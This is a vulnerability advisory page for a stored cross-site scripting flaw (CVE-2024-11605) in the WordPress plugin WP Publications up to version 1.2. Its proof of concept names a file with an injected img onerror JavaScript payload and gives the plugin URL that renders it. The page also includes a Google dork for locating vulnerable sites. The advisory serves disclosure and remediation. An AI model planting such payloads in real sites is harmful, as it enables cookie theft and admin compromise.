WordPress Plugin WP Publications <= 1.2 - Admin+ Stored XSS

2025.09.04
Risk: Low
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: WordPress Plugin WP Publications <= 1.2 - Admin+ Stored XSS # Google Dork: inurl:/wp-content/plugins/wp-publications/ # Date: 2025-07-15 # Exploit Author: Zeynalxan Quliyev, Ravan Poladli # Vendor Homepage: https://wordpress.org/plugins/wp-publications/ # Software Link: https://downloads.wordpress.org/plugin/wp-publications.1.2.zip # Version: <= 1.2 # Tested on: WordPress 6.5.3 / Linux (Apache) # CVE: CVE-2024-11605 ## Vulnerability Details The WP Publications plugin for WordPress (versions <= 1.2) is vulnerable to a **Stored Cross-Site Scripting (XSS)** attack. The vulnerability exists because the plugin fails to escape filenames before outputting them in the HTML, allowing high-privileged users (such as admins) to inject arbitrary JavaScript code. This vulnerability is exploitable even in WordPress configurations where the `unfiltered_html` capability is disabled (e.g., multisite setups). --- ## Proof of Concept (PoC) 1. SSH into the server and navigate to the plugin directory: ```bash cd /var/www/html/wp-content/plugins/wp-publications/ ``` 2. Run the following command to create a malicious BibTeX file: ```bash touch "<img src=x onerror=alert('XSS')>.bib" ``` 3. Access the plugin's BibTeX browser via the following URL: ``` https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib= ``` 4. The injected JavaScript will be executed, triggering the XSS payload: ```javascript alert('XSS'); ``` --- ## Impact * Stored XSS (JavaScript) is executed in the context of the admin panel. * Bypasses `unfiltered_html` protection in multisite environments. * Can be used for privilege escalation, cookie theft, or injecting malicious content. --- ## Recommendation Update to a version of the plugin that properly escapes file names before rendering them in the output. If no update is available, disable the plugin or sanitize file inputs manually. ---

References:

* [CVE-2024-11605 on NVD](
https://nvd.nist.gov/vuln/detail/CVE-2024-11605
) * [WPScan](
https://wpscan.com/vulnerability/91c5ee70-2ff5-46cd-a0f5-54987fc2e060/
)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2025, cxsecurity.com

 

Back to Top